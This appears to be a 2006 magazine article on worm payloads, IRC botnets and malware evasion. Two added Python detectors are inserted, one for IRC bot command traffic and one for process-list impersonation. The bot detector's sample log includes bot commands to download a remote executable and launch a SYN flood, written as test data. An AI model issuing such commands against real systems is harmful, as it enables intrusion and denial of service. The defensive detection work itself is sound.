
The Making of Malware

By Ashton Mills
14:08 Oct 13, 2006
Tags: worm | virus | trojan | adware | malware
Payloads
While a worm’s primary design is to spread, it also has a payload to deliver – the actions it performs on an infected system. As with infection mechanisms, payloads vary widely:
• Damage or delete system files
• Deface webpages
• Plant backdoors
• Install keyloggers
• Act as DDoS (Distributed Denial of Service) zombies
• Perform spam duties
• Send password files
• Transmit sensitive data

To name just a few. Today, a worm’s payload is increasingly about data acquisition rather than damage. By acquisition we mean sifting for credit card numbers, capturing passwords, key logging for bank accounts, transmitting private data, and taking control of remote systems. Nice stuff.

In fact, backdoors created by worms are a major problem. An infected machine can log in to an IRC server and sit in a channel waiting for commands, which could be any of the tasks listed above. Such machines are called ‘zombies’, and en masse ‘bot-nets’.

The victim machines are usually ‘mum and dad’ computers, belonging to users with little knowledge of threats from the Net. Bot-nets can be used to mass-mail spam or launch DDoS attacks against hosts, flooding a target address and knocking a machine or Website off the Net.
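The IRC command channel described above leaves a recognisable footprint on the wire: a generated nick, a join to a keyed channel, and commands arriving as channel messages. The following detector, an added example that is not code from the original article, scores hosts in a constructed sensor log against those three indicators. The channel name, key, nick format and command verbs are hypothetical, chosen to illustrate the pattern rather than copied from any particular worm.

```python
import re
from collections import defaultdict

# Constructed sample of IRC traffic as a network sensor might log it, one
# line per message: direction (C = from the client, S = from the server),
# the client's address, then the raw IRC line. The channel name, key and
# command verbs are hypothetical, not taken from any particular worm.
SAMPLE_LOG = """\
C 10.0.0.7 NICK [AU|XP|00412]
C 10.0.0.7 USER xxx 0 * :xxx
C 10.0.0.7 JOIN #c0ntr0l secretkey
S 10.0.0.7 :ops!ops@irc.example PRIVMSG #c0ntr0l :.ddos.syn 203.0.113.9 80 600
S 10.0.0.7 :ops!ops@irc.example PRIVMSG #c0ntr0l :.download http://198.51.100.5/up.exe
C 10.0.0.7 PRIVMSG #c0ntr0l :[DDoS]: flooding 203.0.113.9 for 600 seconds
C 10.0.0.8 NICK alice
C 10.0.0.8 JOIN #linux
S 10.0.0.8 :bob!bob@irc.example PRIVMSG #linux :anyone tried the new kernel?
"""

# Bots tend to announce themselves with generated nicks of the form
# [COUNTRY|OS|NUMBER]; this pattern is an assumption made for the sample above.
GENERATED_NICK = re.compile(r"^\[?[A-Za-z]{2,3}\|[A-Za-z0-9]+\|\d+\]?$")
# A channel message that starts with a command prefix and a verb, e.g. ".ddos.syn".
COMMAND_TEXT = re.compile(r"^[.!][a-z]+(\.[a-z]+)*(\s|$)")


def parse_line(line):
    """Split a sensor line into (direction, host, raw IRC line)."""
    direction, host, irc_line = line.split(" ", 2)
    return direction, host, irc_line


def irc_command(irc_line):
    """Return (COMMAND, params) for a raw IRC line, dropping any ':prefix'."""
    if irc_line.startswith(":"):
        _, _, irc_line = irc_line.partition(" ")
    command, _, params = irc_line.partition(" ")
    return command.upper(), params


def analyse(log_text):
    """Return {host: [indicator, ...]} for hosts that look like IRC bots.

    A host is reported only when at least two independent indicators fire,
    so a human on a keyed channel or a lone odd nick is not flagged.
    """
    indicators = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        direction, host, irc_line = parse_line(raw)
        command, params = irc_command(irc_line)
        if direction == "C" and command == "NICK" and GENERATED_NICK.match(params):
            indicators[host].append("generated nick: " + params)
        elif direction == "C" and command == "JOIN" and len(params.split()) == 2:
            indicators[host].append("joined keyed channel: " + params.split()[0])
        elif command == "PRIVMSG":
            target, _, text = params.partition(" :")
            if target.startswith("#") and COMMAND_TEXT.match(text):
                who = "received" if direction == "S" else "sent"
                indicators[host].append(f"{who} channel command: {text.split()[0]}")
    return {host: found for host, found in indicators.items() if len(found) >= 2}


if __name__ == "__main__":
    for host, found in analyse(SAMPLE_LOG).items():
        print(host)
        for item in found:
            print("  -", item)
```

On the sample, 10.0.0.7 is reported with four indicators while the ordinary user on #linux is not. The two-indicator threshold is the important design choice: any one of these signals is common in legitimate IRC use, and a detector that fires on a single keyed JOIN will drown an analyst in noise.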

In January this year a 20-year-old from the United States was convicted of controlling and profiting from a network of some 500,000 zombie machines.

It probably didn’t help at all that he targeted the US Naval Warfare Center and Department of Defence!

Staying alive
Worm authors aren’t stupid (unfortunately), and many worms employ a variety of methods to avoid detection or prevent removal, including:
• Impersonating a legitimate program in the process list
• Hiding from the process list
• Hiding inside running applications
• Selectively choosing which email addresses to spam, and which to avoid
• Looking for and disabling virus scanners
• Looking for and bypassing firewall software
• Hiding on hard drives as valid applications

Worms that mass-mail are smart enough to omit domains belonging to security firms and malware researchers, and in some cases worms have been programmed to look for and disable security suites from the likes of Symantec, McAfee and Sophos – at least until the next update. Sometimes the security packages themselves become the way into a system, through vulnerabilities in the security product – as Symantec was forced to address in its antivirus software earlier this year. So not even dedicated security software is safe.
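Several of the tricks in the list above (impersonating a legitimate program in the process list, hiding on disk as a valid application, and disabling the virus scanner or firewall) can be caught by comparing a process snapshot against what the build is supposed to look like. The triage script below is an added example, not code from the original article. The system-binary directories, the lookalike threshold of two edits, and the names of the expected security processes are hypothetical placeholders; a real deployment would take that inventory from a known-good build.

```python
import ntpath
from typing import NamedTuple


class Proc(NamedTuple):
    pid: int
    name: str
    path: str


# Windows system binaries that worms commonly name themselves after, with the
# directory the genuine copy lives in. Assumed layout for a typical install;
# a real check would take this inventory from a known-good build.
SYSTEM_BINARIES = {
    "svchost.exe": r"C:\Windows\System32",
    "lsass.exe": r"C:\Windows\System32",
    "csrss.exe": r"C:\Windows\System32",
    "explorer.exe": r"C:\Windows",
}

# Security processes this build must always have running (hypothetical names).
EXPECTED_SECURITY_PROCS = {"avscanner.exe", "hostfw.exe"}

# Constructed process snapshot as a collector might report it.
SAMPLE_SNAPSHOT = [
    Proc(4, "System", ""),
    Proc(620, "csrss.exe", r"C:\Windows\System32\csrss.exe"),
    Proc(700, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(1340, "svchost.exe", r"C:\Windows\svchost.exe"),  # genuine name, wrong directory
    Proc(1402, "scvhost.exe", r"C:\Windows\System32\scvhost.exe"),  # lookalike name
    Proc(1520, "explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(1800, "hostfw.exe", r"C:\Program Files\HostFW\hostfw.exe"),
]


def edit_distance(a, b):
    """Levenshtein distance; two edits is enough to catch scvhost/svchost swaps."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(snapshot):
    """Return a list of (pid, reason) findings; pid 0 marks a missing process."""
    findings = []
    running = {p.name.lower() for p in snapshot}
    for p in snapshot:
        name = p.name.lower()
        if name in SYSTEM_BINARIES:
            # Impersonation by name: right name, wrong place on the disk.
            expected = SYSTEM_BINARIES[name]
            actual = ntpath.dirname(p.path)
            if actual.lower() != expected.lower():
                findings.append((p.pid, f"{p.name} running from {actual or '<no path>'}, expected {expected}"))
        else:
            # Impersonation by lookalike spelling of a system binary.
            for real in SYSTEM_BINARIES:
                if 0 < edit_distance(name, real) <= 2:
                    findings.append((p.pid, f"{p.name} looks like {real}"))
                    break
    # Disabled scanner or firewall: an expected security process is absent.
    for missing in sorted(EXPECTED_SECURITY_PROCS - running):
        findings.append((0, f"expected security process {missing} not running"))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_SNAPSHOT):
        print(f"pid {pid}: {reason}")
```

On the sample snapshot this flags the svchost.exe running from the wrong directory, the scvhost.exe lookalike, and the absent avscanner.exe. The caveat is the second item in the article’s list: a worm that hides itself from the process list never appears in the snapshot at all, so a check like this must be paired with a second enumeration source (a kernel-level listing, or an offline scan of the disk) rather than trusted on its own.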

And, of course, propagation is the ultimate in self-preservation.

This article appeared in the November, 2006 issue of Atomic.
